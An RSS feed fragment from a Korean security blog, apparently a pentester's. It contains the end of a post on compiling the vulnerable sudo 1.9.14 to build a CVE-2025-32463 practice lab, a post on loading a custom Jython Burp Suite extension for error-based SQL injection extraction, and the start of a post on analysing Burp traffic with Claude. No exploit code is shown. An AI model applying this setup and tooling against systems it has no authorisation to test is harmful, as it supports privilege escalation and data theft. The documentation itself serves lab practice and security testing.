&lt;pre id=&quot;code_1753678463485&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// 1. sudo 소스파일 다운로드
wget https://www.sudo.ws/dist/sudo-1.9.14.tar.gz

// 2. sudo 소스파일 압축 해제
tar -xf sudo-1.9.14.tar.gz

// 3. sudo 소스파일 컴파일 및 make 수행
cd sudo-1.9.14
./configure --prefix=/usr
make

// 4. sudo 설치
sudo make install&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 명령은 순서대로 수행해도 되고, 그냥 쉘파일로 만들어서 수행해도 된다.&lt;br /&gt;그냥 본인 편한대로 패키지 설치하면 될 듯하다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cADONn/btsPBG5m0zV/ylkgaCokG2TxzRqV6bDib1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cADONn/btsPBG5m0zV/ylkgaCokG2TxzRqV6bDib1/img.png&quot; data-alt=&quot;해당 명령어가 귀찮다고 붙여넣기 하지 말자. 에러난다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cADONn/btsPBG5m0zV/ylkgaCokG2TxzRqV6bDib1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcADONn%2FbtsPBG5m0zV%2FylkgaCokG2TxzRqV6bDib1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;해당 명령어가 귀찮다고 붙여넣기 하지 말자. 에러난다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;sudo 패키지 설치 이후, 다음 명령을 통해 설치 여부 확인이 가능하다.&lt;/p&gt;
&lt;pre id=&quot;code_1753678638251&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;sudo --version&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; data-alt=&quot;sudo --version&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEmjoi%2FbtsPBHDdD3I%2FYschaLN03gBNDHHKhJlTX0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo --version&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 시스템 환경은 이 정도면 되고, 가장 중요한 업로드 취약점 서버는 직접 구축해보자.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style7&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고:&lt;/p&gt;
&lt;div data-ke-type=&quot;moreLess&quot; data-text-more=&quot;더보기&quot; data-text-less=&quot;닫기&quot;&gt;&lt;a class=&quot;btn-toggle-moreless&quot;&gt;더보기&lt;/a&gt;
&lt;div class=&quot;moreless-content&quot;&gt;
&lt;figure id=&quot;og_1753678873135&quot; contenteditable=&quot;false&quot; data-og-image=&quot;&quot; data-og-url=&quot;https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=272255&quot; data-og-source-url=&quot;https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=272255&quot; data-og-host=&quot;bugs.freebsd.org&quot; data-og-description=&quot;Update sudo to 19.14 no flags Details | Diff&quot; data-og-title=&quot;272255 &amp;ndash; [PATCH] security/sudo: Update to 1.9.14&quot; data-og-type=&quot;website&quot; data-ke-align=&quot;alignCenter&quot; data-ke-type=&quot;opengraph&quot;&gt;&lt;a style=&quot;color: #000000;&quot; href=&quot;https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=272255&quot; data-source-url=&quot;https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=272255&quot;&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;p style=&quot;color: #000000;&quot; data-ke-size=&quot;size16&quot;&gt;272255 &amp;ndash; [PATCH] security/sudo: Update to 1.9.14&lt;/p&gt;
&lt;p style=&quot;color: #909090;&quot; data-ke-size=&quot;size16&quot;&gt;Update sudo to 19.14 no flags Details | Diff&lt;/p&gt;
&lt;p style=&quot;color: #909090;&quot; data-ke-size=&quot;size16&quot;&gt;bugs.freebsd.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753678977735&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;sudo - Solaris package&quot; data-og-description=&quot;Install sudo on Solaris 10 and 11: pkgadd -d http://get.opencsw.org/now /opt/csw/bin/pkgutil -U /opt/csw/bin/pkgutil -y -i sudo /usr/sbin/pkgchk -L CSWsudo # list files See also: Getting started with OpenCSW Package details Dependencies ( 6 ) Oracle / Sun &quot; data-og-host=&quot;www.opencsw.org&quot; data-og-source-url=&quot;https://www.opencsw.org/package/sudo/&quot; data-og-url=&quot;https://www.opencsw.org/package/sudo/&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://www.opencsw.org/package/sudo/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.opencsw.org/package/sudo/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;sudo - Solaris package&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Install sudo on Solaris 10 and 11: pkgadd -d http://get.opencsw.org/now /opt/csw/bin/pkgutil -U /opt/csw/bin/pkgutil -y -i sudo /usr/sbin/pkgchk -L CSWsudo # list files See also: Getting started with OpenCSW Package details Dependencies ( 6 ) Oracle / Sun&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.opencsw.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753678987628&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;RPM resource sudo(x86-64)&quot; data-og-description=&quot;&quot; data-og-host=&quot;rpmfind.net&quot; data-og-source-url=&quot;https://rpmfind.net/linux/rpm2html/search.php?query=sudo%28x86-64%29&quot; data-og-url=&quot;https://rpmfind.net/linux/rpm2html/search.php?query=sudo%28x86-64%29&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://rpmfind.net/linux/rpm2html/search.php?query=sudo%28x86-64%29&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://rpmfind.net/linux/rpm2html/search.php?query=sudo%28x86-64%29&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;RPM resource sudo(x86-64)&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;rpmfind.net&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753679008838&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;sudo - Debian Package Tracker&quot; data-og-description=&quot;Among the 7 debian patches available in version 1.9.16p2-3 of the package, we noticed the following issues: 3 patches where the metadata indicates that the patch has not yet been forwarded upstream. You should either forward the patch upstream or update th&quot; data-og-host=&quot;tracker.debian.org&quot; data-og-source-url=&quot;https://tracker.debian.org/pkg/sudo&quot; data-og-url=&quot;https://tracker.debian.org/pkg/sudo&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://tracker.debian.org/pkg/sudo&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://tracker.debian.org/pkg/sudo&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;sudo - Debian Package Tracker&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Among the 7 debian patches available in version 1.9.16p2-3 of the package, we noticed the following issues: 3 patches where the metadata indicates that the patch has not yet been forwarded upstream. You should either forward the patch upstream or update th&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;tracker.debian.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753679014349&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;Releases &amp;middot; sudo-project/sudo&quot; data-og-description=&quot;Utility to execute a command as another user. Contribute to sudo-project/sudo development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/sudo-project/sudo/releases&quot; data-og-url=&quot;https://github.com/sudo-project/sudo/releases&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/zyx1h/hyZnhvpVyV/1ZEWXftBknTCyyuk0VdKM1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/myinh/hyZnjGMPN5/mgUDYfxnfq8KPEUxEh38W0/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/sudo-project/sudo/releases&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/sudo-project/sudo/releases&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/zyx1h/hyZnhvpVyV/1ZEWXftBknTCyyuk0VdKM1/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/myinh/hyZnjGMPN5/mgUDYfxnfq8KPEUxEh38W0/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Releases &amp;middot; sudo-project/sudo&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Utility to execute a command as another user. Contribute to sudo-project/sudo development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753679024368&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;More info with -ll in sudo 1.9.15&quot; data-og-description=&quot;Version 1.9.15 of sudo gives more detailed information when using the -ll option. For commands, it adds the rule that allows it. Without a command parameter, it lists rules affecting a given user. It also prints which file contains the given rule, making d&quot; data-og-host=&quot;www.sudo.ws&quot; data-og-source-url=&quot;http://sudo.usenix.org.uk/posts/2023/11/more-info-with-ll-in-sudo-1.9.15/&quot; data-og-url=&quot;https://www.sudo.ws/posts/2023/11/more-info-with-ll-in-sudo-1.9.15/&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;http://sudo.usenix.org.uk/posts/2023/11/more-info-with-ll-in-sudo-1.9.15/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;http://sudo.usenix.org.uk/posts/2023/11/more-info-with-ll-in-sudo-1.9.15/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;More info with -ll in sudo 1.9.15&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Version 1.9.15 of sudo gives more detailed information when using the -ll option. For commands, it adds the rule that allows it. Without a command parameter, it lists rules affecting a given user. It also prints which file contains the given rule, making d&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.sudo.ws&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;</description>
      <category>CVE Analyze/CVE-2025-32463</category>
      <category>CVE-2025-32463</category>
      <category>CVE-2025-32463 docker settings</category>
      <category>CVE-2025-32463 PoC</category>
      <category>CVE-2025-32463 Settings</category>
      <category>CVE-2025-32463 sudo install</category>
      <category>CVE-2025-32463 실습</category>
      <category>CVE-2025-32463 환경구축</category>
      <category>sudo vulnerable server settings</category>
      <category>sudo 취약점</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/81</guid>
      <comments>https://kaisec.tistory.com/entry/CVE-2025-32463-Vulnerable-App-Settings#entry81comment</comments>
      <pubDate>Mon, 28 Jul 2025 14:03:55 +0900</pubDate>
    </item>
    <item>
      <title>Jython Extentions in Burpsuite</title>
      <link>https://kaisec.tistory.com/entry/Jython-Extentions-in-Burpsuite</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;804&quot; data-origin-height=&quot;603&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dovIVB/btsO0cxcx4P/oyzkhwf7vzkOFyfp40EUbk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dovIVB/btsO0cxcx4P/oyzkhwf7vzkOFyfp40EUbk/img.png&quot; data-alt=&quot;Jython + Burpsuite&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dovIVB/btsO0cxcx4P/oyzkhwf7vzkOFyfp40EUbk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdovIVB%2FbtsO0cxcx4P%2Foyzkhwf7vzkOFyfp40EUbk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;804&quot; height=&quot;603&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;804&quot; data-origin-height=&quot;603&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Jython + Burpsuite&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;웹 취약점 점검을 실시하다보면 SQL Injection 구간을 많이 확인할 수 있다. 다만 무조건 적으로 나타나는 것은 아니지만 Error Injection 도 간혹 나타나기도 한다. 블라인드나 유니온 인젝션의 경우 데이터 추출 시, 해당 조건에 맞게 코드를 작성해야한다는 단점이 존재하나 Error Injection 의 경우 노출되는 에러가 정해져있어 보다 편하게 데이터를 추출할 수 있다.&lt;br /&gt;(물론 애시당초 SQL 쿼리문이 먹힌다는 것이 말이 안되는 ... 상황이긴 하지만 말이다.)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;때문에 본인은 그 귀찮음이 싫어 버프슈트 Extention 을 작성하게 되었다. 초반엔 Java 를 이용하여 작성하려 했으나, Java 특성상 버전도 많이타고 하기 때문에 Jython 으로 작성하게 되었다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 기능을 위해선 Burpsuite 내 Jython 기능을 추가해야한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;738&quot; data-origin-height=&quot;664&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bLCjIV/btsO0K71b9f/B8X8lulaPcUBqKo83XMDW1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bLCjIV/btsO0K71b9f/B8X8lulaPcUBqKo83XMDW1/img.png&quot; data-alt=&quot;Burpsuite 내 Python 기반 Extentions 추가 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bLCjIV/btsO0K71b9f/B8X8lulaPcUBqKo83XMDW1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbLCjIV%2FbtsO0K71b9f%2FB8X8lulaPcUBqKo83XMDW1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;738&quot; height=&quot;664&quot; data-origin-width=&quot;738&quot; data-origin-height=&quot;664&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Burpsuite 내 Python 기반 Extentions 추가 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Jython Standalone 파일은 여기에서 다운로드 받을 수 있다.&lt;/p&gt;
&lt;figure id=&quot;og_1751420217106&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Downloads&quot; data-og-description=&quot;The Python runtime on the JVM&quot; data-og-host=&quot;www.jython.org&quot; data-og-source-url=&quot;https://www.jython.org/download.html&quot; data-og-url=&quot;https://www.jython.org/download.html&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://www.jython.org/download.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.jython.org/download.html&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Downloads&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;The Python runtime on the JVM&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.jython.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 파일 다운로드 이후, 본 화면 하단에 노출되어있는 Settings &amp;gt; Extensions &amp;gt; Python enviroment 내 등록해준다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1385&quot; data-origin-height=&quot;943&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/82OGv/btsOZjYqkAX/ZD5vpSL9XMy7bkL0SLQEt1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/82OGv/btsOZjYqkAX/ZD5vpSL9XMy7bkL0SLQEt1/img.png&quot; data-alt=&quot;Jython Standalone 파일 등록&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/82OGv/btsOZjYqkAX/ZD5vpSL9XMy7bkL0SLQEt1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F82OGv%2FbtsOZjYqkAX%2FZD5vpSL9XMy7bkL0SLQEt1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1385&quot; height=&quot;943&quot; data-origin-width=&quot;1385&quot; data-origin-height=&quot;943&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Jython Standalone 파일 등록&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 파일 등록 후 Extentions 내 Add 를 통해 작성된 Extention 을 추가해준다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cXkYVx/btsOZj5akdq/tfGAGmUmUd9rETjrJrkZA0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cXkYVx/btsOZj5akdq/tfGAGmUmUd9rETjrJrkZA0/img.png&quot; data-alt=&quot;Burpsuite - Extensions - Add&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cXkYVx/btsOZj5akdq/tfGAGmUmUd9rETjrJrkZA0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcXkYVx%2FbtsOZj5akdq%2FtfGAGmUmUd9rETjrJrkZA0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1157&quot; height=&quot;813&quot; data-origin-width=&quot;1157&quot; data-origin-height=&quot;813&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Burpsuite - Extensions - Add&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;738&quot; data-origin-height=&quot;664&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dFOrMv/btsO0IilsHp/jkfiJcitvBqicOkeLrEGs1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dFOrMv/btsO0IilsHp/jkfiJcitvBqicOkeLrEGs1/img.png&quot; data-alt=&quot;Extension details - Extension file (.py) - Select file ...&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dFOrMv/btsO0IilsHp/jkfiJcitvBqicOkeLrEGs1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdFOrMv%2FbtsO0IilsHp%2FjkfiJcitvBqicOkeLrEGs1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;738&quot; height=&quot;664&quot; data-origin-width=&quot;738&quot; data-origin-height=&quot;664&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Extension details - Extension file (.py) - Select file ...&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;863&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ldM5u/btsO1hq0rDa/mFWcJrGfVz3caaKJfaxZT1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ldM5u/btsO1hq0rDa/mFWcJrGfVz3caaKJfaxZT1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ldM5u/btsO1hq0rDa/mFWcJrGfVz3caaKJfaxZT1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FldM5u%2FbtsO1hq0rDa%2FmFWcJrGfVz3caaKJfaxZT1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;955&quot; height=&quot;863&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;863&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 화면을 확인해보면 성공적으로 해당 Extention이 추가된 것을 확인할 수 있다.&lt;/p&gt;</description>
      <category>Tools/Burpsuite</category>
      <category>burpsuite extention</category>
      <category>burpsuite extention add</category>
      <category>burpsuite jython</category>
      <category>burpsuite 확장 추가</category>
      <category>burpsutie 익스텐션</category>
      <category>burpsutie 확장</category>
      <category>버프슈트 익스텐션</category>
      <category>버프슈트 확장 추가</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/80</guid>
      <comments>https://kaisec.tistory.com/entry/Jython-Extentions-in-Burpsuite#entry80comment</comments>
      <pubDate>Wed, 2 Jul 2025 11:07:42 +0900</pubDate>
    </item>
    <item>
      <title>Analyzing from Burpsuite with Claude</title>
      <link>https://kaisec.tistory.com/entry/Analyzing-from-Burpsuite-to-Claude</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;804&quot; data-origin-height=&quot;603&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/donHEV/btsOYRFC3il/2cH1oE3wHwMKtd2qJ6z5Dk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/donHEV/btsOYRFC3il/2cH1oE3wHwMKtd2qJ6z5Dk/img.png&quot; data-alt=&quot;Burpsuite With Claude&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/donHEV/btsOYRFC3il/2cH1oE3wHwMKtd2qJ6z5Dk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdonHEV%2FbtsOYRFC3il%2F2cH1oE3wHwMKtd2qJ6z5Dk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;804&quot; height=&quot;603&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;804&quot; data-origin-height=&quot;603&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Burpsuite With Claude&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;최근 LLM 서비스가 급부상하면서 LLM을 이용하여 취약점 분석에 꽤나 많은 도움을 줄 수 있다.&lt;/p&gt;
